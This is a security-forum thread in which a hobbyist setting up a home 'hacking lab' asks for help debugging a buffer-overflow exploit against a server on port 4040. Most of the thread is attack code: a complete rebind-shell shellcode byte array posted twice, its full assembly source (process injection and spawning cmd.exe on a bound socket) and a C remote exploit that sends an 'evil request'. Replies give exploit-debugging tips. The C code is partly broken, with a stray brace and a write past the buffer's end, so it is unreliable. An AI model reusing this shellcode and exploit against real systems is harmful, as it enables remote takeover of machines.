setting up hacking lab
Page 1 of 2 12 LastLast
Results 1 to 10 of 11

Thread: setting up hacking lab

  1. #1
    Senior Member
    Join Date
    Oct 2004
    Posts
    122

    setting up hacking lab

    well let me be honest it was not a hacking LAN it was more of a gaming lan set up by 4 computer game crazy kids(including me).but i am also using that LAN to increase y computer security knowledge trying out a few exploits and coding my own exploits and using them like the WebDAV exploit using a rebind shell on port 80.It was really fun.
    but i had a few problems too say i want to code a exploit for a application(or server)that runs on port 4040.that server is costly 500$ so i can't buy it i am trying to make a dummy server that will run on same port 4040 and accept a string from user store it in a buffer 46500 bytes long just as the server i am trying to exploit does.
    so it will crash on anything valid request above 46500.
    i have been able to send a valid request to the dummy server and crash it but as i was trying to bind it to the same port after service crash( rebind shell code of port 4040
    http://www.scan-associates.net/papers/one-way.zip )it didn't work the origional server runs as a system program by default after installation i just wanted to confirm if it a requirement to exploitation that the software i am exploiting be a system program if yes how can i make my dummy server a system application?
    nobody is perfect i am nobody

  2. #2
    Senior Member Maestr0's Avatar
    Join Date
    May 2003
    Posts
    604
    No, it is not a requirement that it be a SYSTEM account but, that is the ideal type of service to exploit because once you exploit the app your code will run under the same security context as the application you are exploiting. So, having SYSTEM access is as good/better than an Admin, where as if the app was running as a user you would be limted to operations that user has permissions for, which is not as cool as SYSTEM but can probably be leveraged for greater access later. I would suggest using srvany.exe to register your dummy program as a service. Once you register it as a service you can either run it as SYSTEM or any account you specify and play with it from there. Have fun.


    -Maestr0
    \"If computers are to become smart enough to design their own successors, initiating a process that will lead to God-like omniscience after a number of ever swifter passages from one generation of computers to the next, someone is going to have to write the software that gets the process going, and humans have given absolutely no evidence of being able to write such software.\" -Jaron Lanier

  3. #3
    Senior Member
    Join Date
    Oct 2004
    Posts
    122
    thx if it is not a requirement then can u suggest me why i was not able to get a rebind shell as i wanted is there something wrong with my coding(may be in shell code)or can be something else?
    nobody is perfect i am nobody

  4. #4
    Senior Member Maestr0's Avatar
    Join Date
    May 2003
    Posts
    604
    Before you try to spawn a reverse shell, make sure that your exploit is working properly. Start off by writing an exploit that runs locally to pop a cmd.exe or just a 'Hello, World' to insure you can control program flow. Once you are sure the exploit is coded properly then you can try different payloads.

    -Maestr0

    PS. I'm glad you're doing this on your home LAN and not a school computer. Theres absolutely nothing wrong with hacking, but theres a RIGHT way and a WRONG way. The RIGHT way can get you a well paying job doing what you love to do, the WRONG way can get you some prison time. Think about what you want from life.
    \"If computers are to become smart enough to design their own successors, initiating a process that will lead to God-like omniscience after a number of ever swifter passages from one generation of computers to the next, someone is going to have to write the software that gets the process going, and humans have given absolutely no evidence of being able to write such software.\" -Jaron Lanier

  5. #5
    Senior Member
    Join Date
    Apr 2004
    Posts
    1,130
    good luck with your hacking lab. I only advise you to revise all precautions BEFORE start testing to avoid that something "leak" from your test lab to your "good machines"
    Meu sítio

    FORMAT C: Yes ...Yes??? ...Nooooo!!! ^C ^C ^C ^C ^C
    If I die before I sleep, I pray the Lord my soul to encrypt.
    If I die before I wake, I pray the Lord my soul to brake.

  6. #6
    Senior Member
    Join Date
    Oct 2004
    Posts
    122
    here is my rebind shellcode which binds shell to same port (port 4040) u can telnet to target after successful exploitation and get a shell

    unsigned char shellc0de[] =
    "\xEB\x02\xEB\x05\xE8\xF9\xFF\xFF\xFF\x58\x83\xC0\x1B\x8D\xA0\x01"
    "\xFC\xFF\xFF\x83\xE4\xFC\x8B\xEC\x33\xC9\x66\xB9\x0C\x02\x80\x30"
    "\x00\x40\xE2\xFA\x06\x7E\xA9\x96\x96\x96\x18\xD8\x98\x7A\xE4\x68"
    "\x25\x80\x15\x2F\x23\xEE\x44\x51\x31\xFE\x0A\x03\x8C\xF8\x37\xFC"
    "\xAB\x4E\x45\x51\x31\x7E\x1E\xA9\xDC\x08\xE1\xE5\xA4\xC9\xA5\xA4"
    "\x96\x5D\x7B\x6A\xAD\x4F\x9F\x63\x3B\x32\x8C\xE6\x51\x32\x3B\xB8"
    "\x7F\x73\xDF\x10\xDF\xF5\xFB\xF2\x96\xCC\xC4\xF2\xF1\x37\xA6\x96"
    "\x1D\xD6\x9A\x1D\xE6\x8A\x3B\x1D\xCE\x9E\x1D\x64\x1D\x68\x17\x79"
    "\x96\x97\x96\x96\xA5\x5F\x27\x9E\x7E\x06\x97\x96\x96\xC4\xC0\x69"
    "\xC1\x76\xCC\x1D\x4E\x15\x50\x91\xA5\x5F\x27\x93\x7E\xEA\x97\x96"
    "\x96\x7E\x15\x96\x96\x96\xF0\x17\x7A\x06\x97\xC2\xFE\x97\x97\x96"
    "\x96\x69\xC1\x7A\x1D\x7A\xA5\x56\xC6\xC6\xC6\xC6\xD6\xC6\xD6\xC6"
    "\x69\xC1\x66\x1D\x4E\xF0\x51\xD3\x96\x94\x96\xF0\x51\xD3\x94\x19"
    "\x9A\x51\xD3\x92\x96\x96\x96\x96\xFC\x86\xC3\xC5\x69\xC1\x62\x13"
    "\x56\xE3\x74\xD6\xC6\xC5\x69\xC1\x6E\xC6\xC6\xC5\x69\xC1\x6A\x1D"
    "\x4E\xA5\x56\xA5\x5F\x27\x87\xC1\x1D\x6B\x65\x3D\xC9\x50\xD3\x96"
    "\xD2\x1F\xCB\xAA\x1F\xCB\xAE\x1F\xCB\xD6\xF0\x51\xD3\xBA\x97\x97"
    "\x1B\xD3\xD2\xC6\xC3\xC7\xC7\xC7\xD7\xC7\xDF\xC7\xC7\xC0\xC7\x69"
    "\xC1\x46\xA5\x56\xDE\xC6\x69\xC1\x42\xA5\x56\xA5\x5F\x27\x87\xC1"
    "\x1D\x6B\x65\x3D\xC9\x1B\xDB\xD2\xC7\xC3\xC6\xC6\xFC\x92\xFC\x96"
    "\xC6\xC6\xC0\xC6\x69\xC1\x46\x17\x7A\x96\x92\x96\x96\xFE\x91\x96"
    "\x97\x96\xC2\x69\xE3\xDE\x69\xC1\x4E\xFC\xD6\xFE\x96\x86\x96\x96"
    "\xFE\x96\xC6\x96\x96\xFC\x96\x69\xE3\xD2\x69\xC1\x4A\x1D\x4E\x17"
    "\x55\x96\x97\x96\x96\x1F\x0A\xB2\x2E\x96\x96\x96\x1F\x0A\xB2\x22"
    "\x96\x96\x96\x1D\x1A\xB2\x92\x92\x96\x96\x51\xD7\x6D\x06\x06\x06"
    "\x06\x50\xD7\x69\x06\x17\x7F\x14\x97\x96\x96\xFC\x96\xFE\x96\x86"
    "\x96\x96\xC7\xC6\x69\xE3\xD2\x69\xC1\x76\xC2\x69\xE3\xDE\x69\xC1"
    "\x72\x69\xE3\xDE\x69\xC1\x7E\xA5\x56\xDE\xC6\x69\xC1\x42\xC5\xC3"
    "\xC0\xC1\x1D\xFA\xB2\x8E\x1D\xD3\xAA\x1D\xC2\x93\xEE\x95\x43\x1D"
    "\xDC\x8E\x1D\xCC\xB6\x95\x4B\x75\xAF\xDF\x1D\xA2\x1D\x95\x63\xA5"
    "\x69\x6A\xA5\x56\x3A\xAC\x52\xE2\x9D\x06\x06\x06\x06\x57\x59\x9B"
    "\x95\x6E\x7D\x78\xAD\xEA\xB2\x82\xE3\x4B\x1D\xCC\xB2\x95\x4B\xF0"
    "\x1D\x9A\xDD\x1D\xCC\x8A\x95\x4B\x1D\x92\x1D\x95\x53\x7D\x93\x06"
    "\x06\x06\xA5\x56\x1D\x43\xC9\xC8\xCB\xCD\x54\x92\x96\xC7\xC5\x69"
    "\xA0\x7E\x0E\x69\x69\x69\x3D\x3B\xCD\xCF\x74\x67\x55";

    anyways i am not being able to get a shell after the service termination.
    i think there is something wrong with this shell code dunno what.
    nobody is perfect i am nobody

  7. #7
    Banned
    Join Date
    Mar 2003
    Posts
    21
    that \x00 is surely allowed there is absolutely nothing wrong with it i like the way u r going about learning these things exploitaions is not as ewasy as it may appear at first look at it but once u master it u r on a roll.
    as far ur shellcode not working i will suggest u to get some codes from packetstorm start of with simple shellcodes and use then in ur exploit then try to figure out how to write ur own.
    it is really difficult to find any programming mistake u have done in asm specially if u are a newbie .
    just keep a referfence always with u while working with it.

  8. #8
    Senior Member
    Join Date
    Oct 2004
    Posts
    122
    here is my rebind shellcode taken from http://www.scan-associates.net/papers/one-way.zip
    remember it is in tasm

    rebind.asm
    -------------------------------

    ;rebind port shellcode
    ;port at 0xcf
    ;sk@scan-associates.net

    .386p
    locals
    .model flat, stdcall

    .code
    start:

    db 0ebh,02 ;jmp $+2
    db 0ebh, 05h ;jmp $+5
    db 0e8h, 0f9h,0ffh,0ffh,0ffh ;call $-7

    pop eax
    add eax, 1bh
    lea esp,[eax-3ffh]
    and esp, 0fffffffch
    mov ebp,esp
    xor ecx,ecx
    mov cx,20ch ;size
    decode:
    xor byte ptr [eax], 0
    inc eax
    loop decode

    ;header len = 36
    nop
    call here

    ; dd 073e2d87eh ;ExitProcess 77E798FD

    dd 0ec0e4e8eh ;LoadLibraryA 77E7D961
    dd 016b3fe72h ;CreateProcessA 77E61BBC
    dd 078b5b983h ;TerminateProcess
    dd 068a7c7d2h ;GetThreadContext 77E938C2
    dd 06e1a959ch ;VirtualAllocEx 77E7AC24
    dd 0d83d6aa1h ;WriteProcessMemory 77E61A94
    dd 0e8a7c7d3h ;SetThreadContext 77E9391A
    dd 09e4a3f88h ;ResumeThread 77E6A12D
    db "ws2_32",0
    dd 03bfcedcbh ;WSAStartup
    dd 0adf509d9h ;WSASocketA 71ABCF31
    dd 0c7701aa4h ;bind 71ABC328
    dd 0e92eada4h ;listen 71ABC777
    dd 0498649e5h ;accept 71ABCF85
    db "cmd",0
    here:
    pop edx
    push edx

    mov eax,fs:[30h]
    mov eax,[eax+0ch]
    mov esi,[eax+1ch]
    lodsd
    mov ebx,[eax+08h]

    mov esi,edx
    mov edi,esi
    sub edi,100h ;dun mess wif code

    xor ecx,ecx
    ;Get 3 Addr
    mov cl,8
    call loadaddr
    ; add esi,0Ch
    ;Load ws2_32
    push edx
    push esi
    call dword ptr [edi-32] ;LoadLibraryA
    pop edx
    mov ebx,eax
    add esi,7
    xor ecx,ecx
    mov cl,5
    call loadaddr

    call fork
    sub sp, 400
    push esp
    push 101h
    call [edi -20] ;WSAStartup
    mov ebp,esp
    ;add esi,7
    again:
    xor eax,eax
    push eax
    push eax
    push eax
    push eax
    inc eax
    push eax
    inc eax
    push eax
    call dword ptr [edi-16] ;WSASocketA
    ; cmp eax,0FFFFFFFFh
    ; je exit

    ;bind, listen, accept
    mov ebx,eax
    bind:
    mov word ptr [ebp],2
    mov word ptr [ebp+2],0C8Fh ;port
    mov dword ptr [ebp+4], 0 ;IP
    push 10h
    push ebp
    push ebx
    call dword ptr [edi-12] ;bind
    test eax,eax
    jne bind

    inc eax
    push eax
    push ebx
    call dword ptr [edi-8] ;listen (soc, 1);
    ;test eax,eax
    ;jne exit
    push eax
    push eax
    push ebx
    call dword ptr [edi-4] ;accept
    ;cmp eax,0FFFFFFFFh
    ;je exit
    mov ebx,eax
    xor eax,eax
    xor ecx,ecx
    mov cl,11h
    push edi
    mov edi,ebp
    rep stos dword ptr [edi]
    pop edi
    mov byte ptr [ebp],44h
    mov dword ptr [ebp+3Ch],ebx
    mov dword ptr [ebp+38h],ebx
    mov dword ptr [ebp+40h],ebx
    mov word ptr [ebp+2Ch],0101h
    lea eax,[ebp+44h]
    push eax
    push ebp
    push ecx
    push ecx
    push ecx
    inc ecx
    push ecx
    dec ecx
    push ecx
    push ecx
    push esi
    push ecx
    call dword ptr [edi-48] ;CreateProcess
    exit:
    ;jmp again
    ;push eax
    xor eax,eax
    dec eax
    push eax
    call dword ptr [edi-44] ;TerminateProcess

    fork:
    xor eax,eax
    xor ecx,ecx
    mov cl,11h
    push edi
    mov edi,ebp
    rep stos dword ptr [edi]
    pop edi

    lea ecx,[ebp+44h]
    push ecx
    push ebp

    ;code ripped from LSD, thanks Michal!
    push eax
    push eax
    push 04h ; flag=CREATE_SUSPENDED
    push 0 ; inherit=FALSE
    push eax
    push eax
    push esi ; cmdline="cmd"
    push eax ; appname=NULL
    call [edi-48] ; CreateProcess

    ;add ebp,44h

    sub esp,0400h
    push 00010007h ; ctx.ContextFlags=CONTEXT_FULL
    push esp ; ctx
    push dword ptr [ebp+48h] ; hthread
    call [edi-40] ; GetThreadContext

    push 40h ; PAGE_EXECUTE_READWRITE
    push 1000h ; MEM_COMMIT
    push 5000h ; 20kb
    push 0
    push dword ptr [ebp+44h]
    ;push ebp
    call [edi-36] ; alloc memory in a new process

    mov ebx,eax ; buf=allocated memory
    add ebx,100h ; eip=buf+2 (jmp instruction)

    mov [esp+0b8h],ebx ; ctx.Eip=eip
    mov [esp+0b4h],ebx ; ctx.Ebp=eip ???

    ;mov ecx,[esp+4+3ffh-104h] ; return address
    mov ecx,[esp+4+0400h]
    mov dword ptr [ecx-5],90909090h ;no more fork
    mov byte ptr [ecx-1],90h
    sub ecx,182h ;change here!!!

    push 0
    ; push 2000h
    push 1000h
    push ecx
    push eax
    push dword ptr [ebp+44h]
    call [edi-32] ;WriteProcessMemory

    push esp
    push dword ptr [ebp+48h]
    call [edi-28] ;SetThreadContext

    push dword ptr [ebp+48h]
    call [edi-24] ;ResumeThread

    xor eax,eax
    dec eax
    push eax
    call dword ptr [edi-44] ;TerminateProcess

    ; add esp,0400h+4
    ; ret

    ; LGetProcAddress(HASH, DLLBASE) ;stolen from HD Moore
    LGetProcAddress:

    push ebx
    push ebp
    push esi
    push edi
    mov ebp, [esp + 24] ; DLL Base Address
    mov eax, [ebp + 3ch] ; eax = PE header offset
    mov edx, [ebp + eax + 120]
    add edx, ebp ; edx = exports directory table
    mov ecx, [edx + 24] ; ecx = number of name pointers
    mov ebx, [edx + 32]
    add ebx, ebp ; ebx = name pointers table

    LFnlp:
    jecxz LNtfnd
    dec ecx
    mov esi, [ebx + ecx * 4]
    add esi, ebp ; esi = name pointer
    xor edi, edi
    cld

    LHshlp:
    xor eax, eax
    lodsb
    cmp al, ah
    je LFnd
    ror edi, 13
    add edi, eax
    jmp LHshlp

    LFnd:
    ; compare computed hash to argument
    cmp edi, [esp + 20]
    jnz LFnlp
    mov ebx, [edx + 36] ; ebx = ordinals table RNA
    add ebx, ebp
    mov cx, [ebx + 2 * ecx] ; ecx = function ordinal */
    mov ebx, [edx + 28] ; ebx = address table RVA */
    add ebx, ebp
    mov eax, [ebx + 4 * ecx] ; eax = address of function RVA */
    add eax, ebp
    jmp LDone

    LNtfnd:
    xor eax, eax

    LDone:
    mov edx, ebp
    pop edi
    pop esi
    pop ebp
    pop ebx
    ret 4

    loadaddr:
    push ecx
    push ebx
    ; push esi
    push dword [esi-4]
    ;db 0ffh,34h
    call LGetProcAddress
    stosd
    lodsd ;esi+4
    pop ebx
    pop ecx
    loop loadaddr
    ret

    end start

    .data
    -----------------------------------------

    if u study it carefully there is a field where u assign the bind port and the ip address .
    in network byte order.

    ip has been left 0.port number is 4040 in our case.whick is 00000fc8 in hex.
    and i have put it to be 0C8Fh in network byte order.


    is that all right?

    in my c code i am simply connecting to 4040 and creating a buffer 3000 bytes long first 2200 byte filled with nop's i.e. 0x43 then the shellcode .
    i am not using paddings in my code where as all other codes i find on net (based on rebind shellcode) use padding.


    does that make a difference?

    here is my c code

    #include <winsock.h>
    #include <windows.h>
    #include <stdio.h>

    #pragma comment (lib,"ws2_32")

    unsigned char shellc0de[] =
    /* sk - rebind port 4040 shellcode 0xcf = port */
    "\xEB\x02\xEB\x05\xE8\xF9\xFF\xFF\xFF\x58\x83\xC0\x1B\x8D\xA0\x01"
    "\xFC\xFF\xFF\x83\xE4\xFC\x8B\xEC\x33\xC9\x66\xB9\x0C\x02\x80\x30"
    "\x00\x40\xE2\xFA\x06\x7E\xA9\x96\x96\x96\x18\xD8\x98\x7A\xE4\x68"
    "\x25\x80\x15\x2F\x23\xEE\x44\x51\x31\xFE\x0A\x03\x8C\xF8\x37\xFC"
    "\xAB\x4E\x45\x51\x31\x7E\x1E\xA9\xDC\x08\xE1\xE5\xA4\xC9\xA5\xA4"
    "\x96\x5D\x7B\x6A\xAD\x4F\x9F\x63\x3B\x32\x8C\xE6\x51\x32\x3B\xB8"
    "\x7F\x73\xDF\x10\xDF\xF5\xFB\xF2\x96\xCC\xC4\xF2\xF1\x37\xA6\x96"
    "\x1D\xD6\x9A\x1D\xE6\x8A\x3B\x1D\xCE\x9E\x1D\x64\x1D\x68\x17\x79"
    "\x96\x97\x96\x96\xA5\x5F\x27\x9E\x7E\x06\x97\x96\x96\xC4\xC0\x69"
    "\xC1\x76\xCC\x1D\x4E\x15\x50\x91\xA5\x5F\x27\x93\x7E\xEA\x97\x96"
    "\x96\x7E\x15\x96\x96\x96\xF0\x17\x7A\x06\x97\xC2\xFE\x97\x97\x96"
    "\x96\x69\xC1\x7A\x1D\x7A\xA5\x56\xC6\xC6\xC6\xC6\xD6\xC6\xD6\xC6"
    "\x69\xC1\x66\x1D\x4E\xF0\x51\xD3\x96\x94\x96\xF0\x51\xD3\x94\x19"
    "\x9A\x51\xD3\x92\x96\x96\x96\x96\xFC\x86\xC3\xC5\x69\xC1\x62\x13"
    "\x56\xE3\x74\xD6\xC6\xC5\x69\xC1\x6E\xC6\xC6\xC5\x69\xC1\x6A\x1D"
    "\x4E\xA5\x56\xA5\x5F\x27\x87\xC1\x1D\x6B\x65\x3D\xC9\x50\xD3\x96"
    "\xD2\x1F\xCB\xAA\x1F\xCB\xAE\x1F\xCB\xD6\xF0\x51\xD3\xBA\x97\x97"
    "\x1B\xD3\xD2\xC6\xC3\xC7\xC7\xC7\xD7\xC7\xDF\xC7\xC7\xC0\xC7\x69"
    "\xC1\x46\xA5\x56\xDE\xC6\x69\xC1\x42\xA5\x56\xA5\x5F\x27\x87\xC1"
    "\x1D\x6B\x65\x3D\xC9\x1B\xDB\xD2\xC7\xC3\xC6\xC6\xFC\x92\xFC\x96"
    "\xC6\xC6\xC0\xC6\x69\xC1\x46\x17\x7A\x96\x92\x96\x96\xFE\x91\x96"
    "\x97\x96\xC2\x69\xE3\xDE\x69\xC1\x4E\xFC\xD6\xFE\x96\x86\x96\x96"
    "\xFE\x96\xC6\x96\x96\xFC\x96\x69\xE3\xD2\x69\xC1\x4A\x1D\x4E\x17"
    "\x55\x96\x97\x96\x96\x1F\x0A\xB2\x2E\x96\x96\x96\x1F\x0A\xB2\x22"
    "\x96\x96\x96\x1D\x1A\xB2\x92\x92\x96\x96\x51\xD7\x6D\x06\x06\x06"
    "\x06\x50\xD7\x69\x06\x17\x7F\x14\x97\x96\x96\xFC\x96\xFE\x96\x86"
    "\x96\x96\xC7\xC6\x69\xE3\xD2\x69\xC1\x76\xC2\x69\xE3\xDE\x69\xC1"
    "\x72\x69\xE3\xDE\x69\xC1\x7E\xA5\x56\xDE\xC6\x69\xC1\x42\xC5\xC3"
    "\xC0\xC1\x1D\xFA\xB2\x8E\x1D\xD3\xAA\x1D\xC2\x93\xEE\x95\x43\x1D"
    "\xDC\x8E\x1D\xCC\xB6\x95\x4B\x75\xAF\xDF\x1D\xA2\x1D\x95\x63\xA5"
    "\x69\x6A\xA5\x56\x3A\xAC\x52\xE2\x9D\x06\x06\x06\x06\x57\x59\x9B"
    "\x95\x6E\x7D\x78\xAD\xEA\xB2\x82\xE3\x4B\x1D\xCC\xB2\x95\x4B\xF0"
    "\x1D\x9A\xDD\x1D\xCC\x8A\x95\x4B\x1D\x92\x1D\x95\x53\x7D\x93\x06"
    "\x06\x06\xA5\x56\x1D\x43\xC9\xC8\xCB\xCD\x54\x92\x96\xC7\xC5\x69"
    "\xA0\x7E\x0E\x69\x69\x69\x3D\x3B\xCD\xCF\x74\x67\x55";


    void help(char *program)
    {
    printf("aj's syntax: %s server bind_port [\r\ni.e: %s 10.1.1.1 80 \r\n",program,program);
    getch();
    return;
    }

    unsigned int resolve(char *name)
    {
    struct hostent *he;
    unsigned int ip;

    if((ip=inet_addr(name))==(-1))
    {
    if((he=gethostbyname(name))==0)
    return 0;
    memcpy(&ip,he->h_addr,4);
    }
    return ip;
    }

    void main(int argc, char *argv[])
    {
    WSADATA wsaData;
    unsigned short port=0;
    char *port_to_shell="", *ip1="", data[150]="";
    unsigned int i,j;
    unsigned int ip = 0 ;
    int s, PAD;
    struct hostent *he;
    struct sockaddr_in crpt;
    char buffer[3000] ="";
    char request[3300]; // huuuh, what a mess!
    }
    if(argc<3){
    help(argv[0]);
    return;
    }

    PAD = argc==4 ? strtoul(argv[3],0,16): 0x4e;

    if(WSAStartup(0x0101,&wsaData)!=0) {
    printf("error starting winsock..");
    return;
    }

    printf("Exploiting ******** server \n");

    *(unsigned short *)&shellc0de[0xcf] = htons(atoi(argv[2])) ^ 0x4040;

    if ((he = gethostbyname(argv[1]))==0){
    printf("error: can't resolve '%s'",argv[1]);
    return;
    }

    crpt.sin_port = htons(4040);
    crpt.sin_family = AF_INET;
    crpt.sin_addr = *((struct in_addr *)he->h_addr);

    if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
    printf("error: can't create socket");
    return;
    }
    printf("Connecting... ");

    if ((connect(s, (struct sockaddr *) &crpt, sizeof(crpt))) == -1)
    {
    printf("ERROR\r\n");
    return;
    }


    // No Operation.
    for(i=0;i<sizeof(buffer);buffer[i]=0x90,i++);

    for(i=2100,j=0;i<sizeof(buffer)&&j<sizeof(shellc0de);buffer[i]=shellc0de[j],i++,j++);
    // well..it is not necessary..
    //for(i=0;i<2500;buffer[i]=0x41,i++);

    buffer[sizeof(buffer)]=0x00;
    memset(request,0,sizeof(request));

    //Offset from MetaSploit!
    //buffer[283] = PAD+1;//0x4f;
    //buffer[284] = PAD; //0x4e;
    send(s,request,strlen(request),0);


    sprintf(request,"GET http://O%s",buffer);
    sprintf(request,"%s\r\n\r\n",request);

    printf("\nCONNECTED \r\nSending evil request... ");
    printf("\n\n%s\n\n",request);
    send(s,request,strlen(request),0);

    printf("SENT\r\n");
    recv(s,data,sizeof(data),0);
    if(data[0]!=0x00)
    {
    printf("data: %s\r\n",data);
    }
    else
    printf("Now connect to port 4040 to get a shell!\r\n");
    closesocket(s);
    return;
    }

    as u can see it just sends a valid request to the server( a long one)overflow occures at 2034 so after nop's we have placed a shellcode that is supposed to bind shell to a port specified by user
    or 4040 by default.
    the caode is working fine any mistakes if found are copy paste mistakes.i am being able to terminate the dummy server but not being able to get a shell
    there must be some problem with this shellcode i have designed.
    i have decided to install win2000 server with IIS 5 enable WebDAV and try to create same rebind shellcode for port 80 .
    see how it goes
    nobody is perfect i am nobody

  9. #9
    Senior Member
    Join Date
    Oct 2004
    Posts
    122
    sforce that \x00 is not allowed 00 is replaced by ur decoding argument in my case 96;
    so \x00 is replaced by \x96.

    that part is over anyways it is a remote exploit having a structure nopnopnop.........(overflo here).....nopnop..shellcode

    what is the role of ret address in this case coz that might be missing link of this shellcode
    is it required here?
    nobody is perfect i am nobody

  10. #10
    Senior Member Maestr0's Avatar
    Join Date
    May 2003
    Posts
    604
    Get rid of the NULL byte.


    -Maestr0

    EDIT: Something else, this may be what you want I'm not sure your code is a bit umm.....messy but here:

    buffer[sizeof(buffer)]=0x00;
    memset(request,0,sizeof(request));
    ## Zero out the 'request' buffer

    //Offset from MetaSploit!
    //buffer[283] = PAD+1;//0x4f;
    //buffer[284] = PAD; //0x4e;
    send(s,request,strlen(request),0); ## Empty?

    ## You sent the 'request' buffer which is 3300 Zero's right now (Has it overflowed already?)

    sprintf(request,"GET http://O%s",buffer);
    sprintf(request,"%s\r\n\r\n",request);

    ## Now you have written the actual request + SC into the 'request' buffer

    printf("\nCONNECTED \r\nSending evil request... ");
    printf("\n\n%s\n\n",request);
    send(s,request,strlen(request),0);

    ## Now you have sent it again. Is this intentional?

    You will still need to avoid the null byte in the shellcode. If its a register you can just use the lower half of the 16 bit register.


    -Maestr0
    \"If computers are to become smart enough to design their own successors, initiating a process that will lead to God-like omniscience after a number of ever swifter passages from one generation of computers to the next, someone is going to have to write the software that gets the process going, and humans have given absolutely no evidence of being able to write such software.\" -Jaron Lanier

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •